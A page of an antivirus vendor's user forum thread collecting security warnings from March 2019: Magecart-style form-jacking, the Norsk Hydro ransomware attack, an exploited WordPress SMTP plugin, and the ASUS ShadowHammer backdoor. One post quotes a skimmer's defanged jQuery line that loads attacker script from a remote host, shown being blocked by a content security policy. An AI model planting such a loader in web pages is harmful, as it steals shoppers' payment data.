Author Topic: SECURITY WARNINGS & Notices - Please post them here  (Read 1712038 times)

0 Members and 11 Guests are viewing this topic.

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 59841
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Windows 8.1 [x64] - Avast Premier 19.6.2383.BC - CC 5.59 - EEK - Firefox ESR 60.8 [NS/AOS/uBO] - TB 60.8 [EM] - ACP/ASB/ASL.BC
Deutschsprachiger Bereich -> Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31528
  • malware fighter
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5851 on: March 16, 2019, 04:17:07 PM »
Many webshops fall victim to form-jacking
Think of the Magecart campaign and recently
https://www.group-ib.com/media/js-sniffer/
Quote
payment data of thousands of customers of UK and US online stores could have been compromised
Quote
It is loading the script from gmo.li using a jQuery getScript call, so a properly constructed CSP would have blocked it. Tested using one of my own CSP protected sites. See result here:


$.getScript('hxtp://gmo.li/js.php?r=008353')

Content Security Policy: The page’s settings blocked the loading of a resource at hxtp://gmo.li/js.php?r=008353&_=1552623429549 (“default-src”).


Implementing CSP on someone else's code would be really tough.
info credits go to foxonsafari.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31528
  • malware fighter
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5852 on: March 19, 2019, 03:14:12 PM »
One of the biggest Aluminium producers hit by ransomeware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 35838
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 81607
  • No support PMs thanks
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5854 on: March 19, 2019, 05:31:10 PM »
One of the biggest Aluminium producers hit by ransomeware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137

polonus
In English   https://www.newsinenglish.no/2019/03/19/hydro-comes-under-major-cyber-attack/

If this does nothing else, it should show business has to isolate critical systems and have a robust backup and recovery strategy.  Assuming they have an IT department.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 19.6.2383/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ WinPatrol+/

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31528
  • malware fighter
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5855 on: March 22, 2019, 12:15:14 AM »
WordPress sites under attack via vulnerable plug-in: https://wordpress.org/plugins/easy-wp-smtp/#developers
Attacks ongoing since March 15th: https://blog.nintechnet.com/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin/
Update the plug-in in question: https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline markspectrum-mgt.com

  • Newbie
  • *
  • Posts: 1
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5856 on: March 22, 2019, 12:44:31 AM »
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/

The message:
Warning
This site could have harmed your computer
Get me out of here

Any info would be appreciated.

Offline bob3160

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40977
  • 59 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5857 on: March 22, 2019, 12:51:54 AM »
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/

The message:
Warning
This site could have harmed your computer
Get me out of here

Any info would be appreciated.
Report a URL
https://www.avast.com/report-a-url.php
Free avast! Security Seminar: https://goo.gl/kh3cqR  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 10 Pro v1903 64bit, 8 Gig Ram, AvastFree 19.5.2378, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq


Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 35838
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5859 on: March 26, 2019, 08:11:53 AM »
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection



Kaspersky  https://securelist.com/operation-shadowhammer/89992/
Quote
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.



Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline bob3160

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40977
  • 59 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5860 on: March 26, 2019, 02:17:52 PM »
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection



Kaspersky  https://securelist.com/operation-shadowhammer/89992/
Quote
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
Free avast! Security Seminar: https://goo.gl/kh3cqR  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 10 Pro v1903 64bit, 8 Gig Ram, AvastFree 19.5.2378, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq

Offline ehmen

  • Poster
  • *
  • Posts: 449
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5861 on: March 26, 2019, 03:51:30 PM »
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
So if a Avast scan is done and the results is clean it means the computer isn't infected or affected by any of this?

Offline bob3160

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40977
  • 59 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5862 on: March 26, 2019, 03:59:52 PM »
Correct. :)
Free avast! Security Seminar: https://goo.gl/kh3cqR  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 10 Pro v1903 64bit, 8 Gig Ram, AvastFree 19.5.2378, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 35838
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5863 on: March 26, 2019, 04:30:02 PM »
Correct. :)
Partly correct

You can still have one of the network adapter listed, you may have one made by Asus even if not running a Asus computer


« Last Edit: March 26, 2019, 04:33:16 PM by Pondus »
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline ehmen

  • Poster
  • *
  • Posts: 449
Re: SECURITY WARNINGS & Notices - Please post them here
« Reply #5864 on: March 26, 2019, 06:22:37 PM »
You can still have one of the network adapter listed, you may have one made by Asus even if not running a Asus computer
Please explain what you mean.